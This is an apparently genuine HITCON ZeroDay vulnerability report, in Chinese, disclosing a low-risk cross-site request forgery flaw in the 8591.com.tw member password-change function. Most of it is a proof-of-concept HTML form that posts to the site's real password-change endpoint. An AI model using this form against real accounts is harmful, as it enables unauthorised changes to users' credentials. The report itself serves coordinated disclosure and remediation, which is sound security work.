Vulnerability Detail Report
Vulnerability Overview
- ZDID: ZD-2019-00258
- 發信 Vendor: 數字科技股份有限公司
- Title: 8591 CSRF
- Introduction: Cross-Site Request Forgery
處理狀態
目前狀態
公開
Last Update : 2019/05/17
-
新提交
-
已審核
-
已通報
-
未回報修補狀況
-
未複測
-
公開
處理歷程
- 2019/03/17 10:54:13 : 新提交 (由 Noth 更新此狀態)
- 2019/03/17 19:57:15 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2019/03/22 11:15:11 : 修補中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2019/03/22 11:15:11 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2019/03/22 11:15:11 : 修補中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2019/05/17 03:00:01 : 公開 (由 HITCON ZeroDay 平台自動更新)
詳細資料
- ZDID:ZD-2019-00258
- 通報者:Cake7528064 (Noth)
- 風險:低
- 類型:跨站冒名請求 (Cross-Site Request Forgery, CSRF)
參考資料
攻擊者可經由該漏洞惡意操控使用者帳號進行惡意行為。
漏洞說明: OWASP - Cross-Site Request Forgery (CSRF)
https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)
防禦措施: OWASP - Cross-Site Request Forgery (CSRF) Prevention Cheat Sheet
https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)_Prevention_Cheat_Sheet
漏洞說明: OWASP - Cross-Site Request Forgery (CSRF)
https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)
防禦措施: OWASP - Cross-Site Request Forgery (CSRF) Prevention Cheat Sheet
https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)_Prevention_Cheat_Sheet
(本欄位資訊由系統根據漏洞類別自動產生,做為漏洞參考資料。)
相關網址
https://www.8591.com.tw/user-login.html?returnUrl=https%3A%2F%2Fwww.8591.com.tw%2Fuser-editUserInfo.html%3Ftype%3DuserPwdDiv%26tip%3DshowTip%26type_m%3DmemberPassword
敘述
未有_token(令牌)做驗證,導致CSRF。
攻擊者構造表單 Code
PoC :
<html>
<head>
</head>
<body>
<form name="myChoices" method="post" action="https://www.8591.com.tw/user-editUserInfo.html?type_m=memberPassword">
<ul>
<li><div class="span_left"><span class="right">會員帳號:</span></div><div class="span_right"><span class="left">zxc752****</span></div></li>
<li><div class="span_left"><span class="right">新會員密碼:</span></div><div class="span_right"><span class="left"><input class="input_in" name="newpwd" type="password" id="pwd1" size='15' maxlength="20" /></span><span class="blurMsg" id="newpwdTip"><span class="infomention"> 密碼長度為6-20字元,字母區分大小寫。</span></span></div></li>
<li><div class="span_left"><span class="right">再輸一次新密碼:</span></div><div class="span_right"><span class="left"><input class="input_in" name="renewpwd" type="password" id="renewpwd1" size='15' maxlength="20" /></span><span class="blurMsg"><span class="infomention"> 請再次填寫要修改的會員密碼。</span></span></div></li>
<li><div class="span_left"><span class="right">舊會員密碼:</span></div><div class="span_right"><span class="left"><input class="input_in" name="pwd" type="password" id="inputPwd" size='15' maxlength="20" /></span><span class="blurMsg"></span></div></li>
<li class="confirmation"><div class="span_left"><span class="right"> </span></div>
<div class="span_right"><span class="left">
<input type="submit" id="subButton" name="subButton" value="確認修改" class="subButton">
<input name="code" type="hidden" id="code" value="">
<input name="game" type="hidden" id="game" value="0">
<input name="server" type="hidden" id="server" value="0">
<input name="module" type="hidden" value="user">
<input name="action" type="hidden" value="editUserInfo">
<input type="hidden" id="checkModule" value="editUser" />
</span></div></li>
</ul>
</form>
</body>
</html>擷圖
留言討論
登入後留言
聯絡組織
發送私人訊息
您也可以透過私人訊息的方式與組織聯繫,討論有關於這個漏洞的相關資訊。